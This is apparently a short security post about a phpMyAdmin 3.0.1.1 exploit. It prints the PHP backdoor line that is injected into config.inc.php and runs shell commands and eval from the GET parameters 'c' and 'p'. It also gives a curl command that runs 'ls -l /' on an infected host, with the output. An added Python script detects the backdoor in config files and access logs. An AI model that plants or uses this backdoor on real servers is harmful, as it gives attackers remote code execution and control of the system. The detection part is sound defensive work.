It's a bash script that injects code into config.php allowing remote code execution:
$cfg['Servers'][$i]['host']=''; if($_GET['c']){echo '(pre)';system($_GET['c']);echo '(/pre)';}if($_GET['p']){echo '(pre)';eval($_GET['p']);echo '(/pre)';};//'] = 'localhost';
By the way, on an infected system we could execute commands like this:
$ curl "http://dominio-afectado/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/"
total 96
drwxr-xr-x 2 root root 4096 Mar 11 10:12 bin
drwxr-xr-x 3 root root 4096 May 6 10:01 boot
drwxr-xr-x 15 root root 14300 Jun 5 09:02 dev
drwxr-xr-x 147 root root 12288 Jun 5 09:02 etc
drwxr-xr-x 3 root root 4096 Oct 18 2008 home
drwxr-xr-x 2 root root 4096 Jul 2 2008 initrd
[...]
I think you should read the proof of concept carefully.
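
A defender-side check for the backdoor shown above, as an added example that is not part of the original post: it flags request-driven code in a phpMyAdmin config file, and access-log requests that pass the c or p parameters to config/config.inc.php. The function names, sample config, log lines and IP addresses are constructed for illustration, and the Apache combined log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Calls and superglobals that a phpMyAdmin config file (plain $cfg assignments)
# is assumed to have no reason to contain.
SUSPICIOUS_PHP = re.compile(
    r"\b(system|eval|exec|passthru|shell_exec|popen|proc_open|assert)\s*\("
    r"|\$_(GET|POST|REQUEST|COOKIE)\b")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
BACKDOOR_PARAMS = ("c", "p")  # parameter names read by the injected code on this page

def scan_config(text):
    """Return (line_number, line) for config lines holding request-driven code."""
    return [(n, line.strip()) for n, line in enumerate(text.splitlines(), 1)
            if SUSPICIOUS_PHP.search(line)]

def scan_access_log(lines):
    """Return (path, param, decoded_value, status) for requests driving the backdoor."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        # The request on this page contains '//config/', so collapse repeated slashes.
        path = re.sub(r"/{2,}", "/", url.path)
        if not path.endswith("/config/config.inc.php"):
            continue
        query = parse_qs(url.query)  # also decodes '+' and %xx in the value
        for name in BACKDOOR_PARAMS:
            for value in query.get(name, []):
                hits.append((path, name, value, int(m.group(2))))
    return hits

# Constructed samples (not real logs or a real host).
SAMPLE_CONFIG = """<?php
$cfg['Servers'][$i]['host']=''; if($_GET['c']){echo '(pre)';system($_GET['c']);echo '(/pre)';}//'] = 'localhost';
$cfg['Servers'][$i]['auth_type'] = 'cookie';
?>"""
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Jun/2009:09:14:02 +0200] "GET /phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/ HTTP/1.1" 200 612',
    '198.51.100.4 - - [05/Jun/2009:09:15:10 +0200] "GET /phpMyAdmin-3.0.1.1/index.php HTTP/1.1" 200 4312',
]

if __name__ == "__main__":
    for hit in scan_config(SAMPLE_CONFIG):
        print("config:", hit)
    for hit in scan_access_log(SAMPLE_LOG):
        print("log:", hit)
```

A 200 response to such a request means the config file was served and executed from the web-accessible config/ directory, so the decoded parameter value shows which command was run.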